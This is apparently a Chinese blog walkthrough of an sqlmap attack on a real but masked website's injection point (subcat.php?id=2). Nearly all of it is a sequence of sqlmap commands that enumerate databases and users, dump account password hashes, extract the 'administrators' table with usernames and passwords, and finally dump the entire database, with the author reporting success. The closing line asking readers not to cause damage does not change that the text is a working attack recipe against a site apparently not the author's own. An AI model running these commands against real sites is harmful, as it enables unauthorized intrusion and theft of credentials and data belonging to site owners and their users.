一次sqlmap***实例
某日,发现一个sql注入点,http://www.******.com/subcat.php?id=2打算***一下(为了不泄露信息,网址全打码)。
科普一下:
SQLMAP 是一款开源的***测试程序,它可以自动探测和利用 SQL 注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点***的速率还是灰常让人满意的。
***开始:
首先检查一下注入点是否可用
sqlmap -u http://www.******.com/subcat.php?id=2 --batch
--batch:中间避免手动输入Y来确认
可见注入点是可以使用的。
2.暴库,看看都有哪些数据库:
#sqlmap -u --dbs
如上图,爆出了5个数据库。
3.找出web当前使用的是哪个数据库:
#sqlmap -u http://www.******.com/subcat.php?id=2 --current-db
4.找出web当前数据库的账户:
#sqlmap -u http://www.******.com/subcat.php?id=2 --current-user
5.列出数据库所有用户:
#sqlmap -u http://www.******.com/subcat.php?id=2 --users
可以看书只有一个用户。
6.获取数据库账户与密码:
#sqlmap -u http://www.******.com/subcat.php?id=2 --passwords
7.获取当前数据库的所有表:
#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history --tables
-D:指定数据库
8.找出表中都有哪些字段:
#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators --columns
-T:指定表
可以看出表中有5个字段。
9.爆字段内容:
#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --dump
-C:指定字段
--dump:导出,否则shell上不会显示内容,只能到日志中查看
若内容太多,可以指定显示那一部分:
--start:指定导出的开始的行
--stop:指定导出结束的行
#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --start 1 --stop 10 --dump
如上,爆出了字段的内容,及获得了用户名和密码,有的密码是经过hash加密的需要破解。
10.***:
#sqlmap -u http://www.******.com/subcat.php?id=2 --dump-all
上图为拖的库的一部分。
为了和谐的网络环境,大家不要做破坏的事情。








